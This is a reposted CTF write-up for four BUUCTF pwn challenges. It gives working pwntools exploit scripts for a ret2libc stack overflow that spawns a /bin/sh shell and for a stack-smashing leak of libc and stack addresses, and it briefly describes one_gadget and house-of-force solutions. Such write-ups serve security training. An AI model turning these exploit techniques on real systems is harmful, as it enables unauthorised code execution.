PWN-PRACTICE-BUUCTF-24
生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-24
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
PWN-PRACTICE-BUUCTF-24
- cmcc_pwnme1
- wdb2018_guess
- oneshot_tjctf_2016
- gyctf_2020_force
cmcc_pwnme1
棧溢出,ret2libc
# -*- coding:utf-8 -*- from pwn import * #context.log_level="debug" io=remote("node4.buuoj.cn",27883) elf=ELF("./pwnme1") libc=ELF("./libc-2.23-16-x32.so") puts_got=elf.got["puts"] puts_plt=elf.plt["puts"] main=0x080486F4 #getflag=0x08048677 io.sendlineafter(">> 6. Exit \n","5") io.recvuntil("Please input the name of fruit:") payload="a"*(164+4)+p32(puts_plt)+p32(main)+p32(puts_got) io.sendline(payload) puts_addr=u32(io.recvuntil("\xf7")[-4:]) print("puts_addr"+hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] system=libc_base+libc.sym["system"] binsh=libc_base+libc.search("/bin/sh").next() io.sendlineafter(">> 6. Exit \n","5") io.recvuntil("Please input the name of fruit:") payload="a"*(164+4)+p32(system)+p32(main)+p32(binsh) io.sendline(payload) io.interactive()wdb2018_guess
stack smashing,參考:wdb2018_guess stack smashing
# -*- coding:utf-8 -*- from pwn import * #io=process("./GUESS") io=remote("node4.buuoj.cn",25593) elf=ELF("./GUESS") libc=ELF("./libc-2.23-16-x64.so") puts_got=elf.got["puts"]io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(puts_got) io.sendline(payload) io.recvuntil("*** stack smashing detected ***: ") puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("puts_addr=="+hex(puts_addr)) libc_base=puts_addr-libc.sym["puts"] libc_environ=libc_base+libc.sym["__environ"]io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(libc_environ) io.sendline(payload) io.recvuntil("*** stack smashing detected ***: ") stack_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00")) print("stack_addr=="+hex(stack_addr))io.recvuntil("Please type your guessing flag\n") payload="a"*0x128+p64(stack_addr-0x168) io.sendline(payload)io.interactive()oneshot_tjctf_2016
通過puts_got泄露puts的真實地址,計算libc基地址,進而計算one_gadget地址
發(fā)送one_gadget地址,程序跳轉執(zhí)行
gyctf_2020_force
house of force
參考:寒假訓練 gyctf_2020_force (2/250)
總結
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-24的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 金价要凉了?美国新一轮经济刺激计划难落地
- 下一篇: 正式落地,又有两地对大额取现进行限制,取